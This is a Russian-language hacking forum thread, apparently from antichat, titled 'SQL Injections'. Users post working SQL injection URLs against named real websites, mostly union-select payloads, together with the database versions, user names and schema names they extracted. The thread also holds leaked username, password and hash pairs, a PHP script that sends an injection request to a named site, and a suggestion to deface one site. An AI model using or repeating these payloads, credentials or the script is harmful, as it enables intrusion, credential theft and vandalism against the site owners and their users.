SQL Инъекции

ОМГ убери пробелы из ссылки

Вывод:
_http://www.proline.lv/lv/brandlines?brandID=1&confID=-2+union+select+1,2,user(),4,version(),6,7,8,9,0,11,12,13,14/*

 

http://www.ask4ufe.com

Code:

http://www.ask4ufe.com/transcript.cfm?pid=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--

 

http://www.sequa.de Pr5

Code:

http://www.sequa.de/index.php?categ=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3/*&parent=0&p=downloads&area=1

 

CinemaBlend.Com

 

http://www.pangeaday.org

PR=6

Code:

http://www.pangeaday.org/filmDetail.php?id=2+ union+select+1,2,3,4,5,6,concat(database(),0x3a, version(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

database: pangea
version: 5.0.22-log
user: [email protected]

 

austadiums:auuMTgEV9/KAA

7c485725fbe136da96b2c9bc8e182999:m1shka505
c27f50fdbc6e40bef29c198d6d209b0c

====================================

boss:maerro

====================================

Bob:6b333422e6af650594854e99ecca5fc8:shizzy1

====================================

kamtec:1b8bd1736ab19985:kamtec112
http://admin.isra.com/
http://sales.isra.com/admin/index.php
но пасс не идёт

====================================

ckaminsky:7b490bbc3fa14869283ee2a6b4c49f1b:vivacolorado
gfranklin:5f4dcc3b5aa765d61d8327deb882cf99:password

 

www.fondationbrigittebardot.fr PR=5

www.fondationbrigittebardot.fr

PR=5

Code:

http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*

database: fonbriba
version: 4.1.11-Debian_4sarge7-log
user: fonbriba@localhost

P.S.Спасибо jokester'y.

 

Напомню правила темы:

https://forum.antichat.ru/showpost.php?p=392272&postcount=2

Code:

Выставление репутации в темах:

SQL Инъекции
PHP Иньекции
Пассивные XSS
Активные Xss
Админки

В связи с участившимися случаями накрутки репутации, при выставление репутации в этих темах ограничтесь её кол-вом от 1 до 3.

При оценивание постов этих темах, старайтесь сделать это как можно более рационально - не стоит ставить +3 за каждый пост, выбирайте наиболее объективную оценку.

Несоблюдение этого правила (высталение большего кол-ва репутации) будет говорить о накрутки репутации.

Накрутка репутации будет пресекаться минусами.

Посмотрел репутацию пользователей которые тут постили инъекции:

Code:

+5		SQL Инъекции	22.05.2008 20:12	Ded MustD!e	расти большой)

Поставленно за это: https://forum.antichat.ru/showpost.php?p=698956&postcount=5565

Code:

+5		SQL Инъекции	20.05.2008 22:44	zl0ba	За активность в теме "SQL inj"

Поставленно за это: https://forum.antichat.ru/showpost.php?p=689954&postcount=5541

Не знаю что вы нашли там полезного, ровно как и полезного в активности в этой теме в выкладывание инъекций, выводящих версии, но подобные случаи будут считаться накруткой репутации и за это будут выставляться минусы.

Так же напомню что выкладывать нужно только раскрученные инъекции (см первый пост темы).

Не понятно зачем писать ПР/ТИЦ и т.д. но при этом выводить только версию БД, не можете нормально раскрутить инъекцию, но хотите побольше плюсиков?

Тема не для вопросов/ответов, для этого есть другая тема - вопросы/ответы в этой теме считаються оффтопом, а за оффтоп ставяться минусы.


Возмущайтесь в другом месте, обсуждение действий модератора в несоответсвующем разделе будут пресекаться (Const)

 

выводит INFORMATION_SCHEMA.TABLES
с сайта samba.org.ua

PHP:

<?   
 echo "<pre>\n";   
 @set_time_limit(0);   
 @ini_set("display_errors","0");   
 $hostname = gethostbyname('samba.org.ua');   
 function info($info)   
 {   
  global $hostname;   
  $responce = "";   
  $fsock    = fsockopen($hostname,80,$errnum,$errstr,2);   
  $headers  = "GET http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NA  ME)),4 FROM $info HTTP/1.1\n";   
  $headers .= "Host: my-photo.ru\n";   
  $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";   
  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";   
  $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";   
  $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";   
  $headers .= "Keep-Alive: 500\n";   
  $headers .= "Connection: close\n";   
  $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";   
  fwrite   ($fsock,$headers);   
  while    (!feof($fsock)) $responce .= fread($fsock,1024);    
  fclose   ($fsock);   
 $patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";   
 if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';   
//echo $responce;   
}   
info("INFORMATION_SCHEMA.TABLES");   
echo "</pre>";   
?>


 

http://www.verbste.kz

Code:

http://www.verbste.kz/ecommerce/index.php?idr=100+union+select+1,2,3,4,5,6+/*

database: verbste_verbste
user: verbste_verbste@localhost
version: 4.1.22-standard

http://www.kro.su

Code:

http://www.kro.su/news/foto/more/?pid=-1+UNION+SELECT+1,2,3,4,5,6,7/*

user: krosu_user@localhost
database: krosu_main
version: 4.1.22-standard-log

 

nickjacobsen.com

Code:

http://www.nickjacobsen.com/index.php?id=2+union+select+1,2,3,unhex(hex(concat_ws(0x3,version(),user(),database())))/*

5.0.18web12@localhostusr_web12_1

Code:

http://www.nickjacobsen.com/index.php?id=2+union+select+1,2,3,concat(username,0x3,password)+from+members+limit+1,1/*

web12L3Ahzh09

 

Shoptop.kiev.ua - магазин

Mobiman.com.ua - Интернет магазин.

Instore.kz - интернет магазин. 2 колонки)

 

http://www.yug.odessa.ua/new/view.php?tid=-1+UNION+SELECT+1,2,3,4,5,6&tr=a еще одна.

 

http://www.aei.brookings.org/

HTML:

http://www.aei.brookings.org/publications/abstract.php?pid=-296+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19/*

4.0.25-standard-log:[email protected]:aei_brookings

 

Еще парочка:
http://www.trigeneve.ch/news_fichiers/news.php?mode=voir&nb=1+UNION+SELECT+1,2,3,4,concat_ws(0x3b,pseudo,pass,email),6,7+from+tr_user_news/*

--------------------------------
http://www.pulp-world.com/trigeneve/news_fichiers/news.php?mode=voir&nb=1+UNION+SELECT+1,2,3,4,concat_ws(0x3b,pseudo,pass,email),6,7+from+tr_user_news/*

---------------------------------
http://www.srib.be/index.php?option=com_filiale&idFiliale=-1+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users/*

И

http://www.dddhouse.com/v3/product_details.php?ProductID=8416&LanguageID=1+order+by+1/* - Тут что-то, у меня не получается дальше продвинуться.

 

33x.ru - Интернет Магазин

осталось подобрать колонки, вчера в 3 часа ночи дотыкал до 30 и забил))

 

www.hcvolga.ru - сайт хоккейного клуба Волга

[email protected]4.0.27-max-loghcvolga7

www.fcvu.ru - официальный сайт футбольного клуба Волги

[email protected]#5.0.45-log#fcvu131

 

PHP:

http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Admin,Passw),3,4,5,6,7+from+admin%23

http://www.aziendeinvista.it/

 

zavarka.ru
http://zavarka.ru/texts/cgi-bin/show.cgi?id=999999+union+select+1,2,3,4,version(),6,7,8/*

надо сделать дефейс: "дрочить вредно")

 

Code:

http://www.ultimatemyspace.com/preview.php?id=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6+from+users--